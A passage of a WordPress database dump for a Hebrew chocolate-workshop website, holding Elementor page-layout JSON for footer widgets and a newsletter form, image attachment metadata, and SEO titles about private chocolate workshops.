\\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1448,299,'_elementor_template_type','page'),(1449,299,'_elementor_edit_mode','builder'),(1450,299,'_wp_page_template','default'),(1451,299,'_elementor_data','[{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1452,297,'_elementor_version','0.4'),(1459,301,'_wp_attached_file','2019/01/cupcakes-690040_640.jpg'),(1460,301,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:31:\"2019/01/cupcakes-690040_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"cupcakes-690040_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"cupcakes-690040_640-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:31:\"cupcakes-690040_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1461,296,'_thumbnail_id','301'),(1462,296,'_wp_page_template','default'),(1465,296,'_yoast_wpseo_primary_category',''),(1467,306,'_edit_last','1'),(1468,306,'_edit_lock','1579086362:1'),(1469,307,'_wp_attached_file','2019/01/chocolate-1285928_640.jpg'),(1470,307,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:33:\"2019/01/chocolate-1285928_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"chocolate-1285928_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"chocolate-1285928_640-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:33:\"chocolate-1285928_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1471,306,'_wp_page_template','default'),(1474,306,'_yoast_wpseo_title','שף פרטי לסדנאות שוקולד'),(1475,306,'_yoast_wpseo_metadesc','תארו לעצמיכם שהייתם יכולים להכין את קינוחי השוקולד האהובים עליכם, מבלי לצאת מהבית. בדיוק בשביל זה אפשר להזמין שף פרטי לסדנאות שוקולד הביתה.'),(1476,306,'_yoast_wpseo_primary_category','7'),(1477,306,'_thumbnail_id','307'),(1486,174,'_elementor_template_type','post'),(1500,313,'_wp_page_template','elementor_header_footer'),(1501,313,'_elementor_edit_mode','builder'),(1502,313,'_elementor_template_type','post');
INSERT INTO `xrx_postmeta` VALUES (1503,313,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd 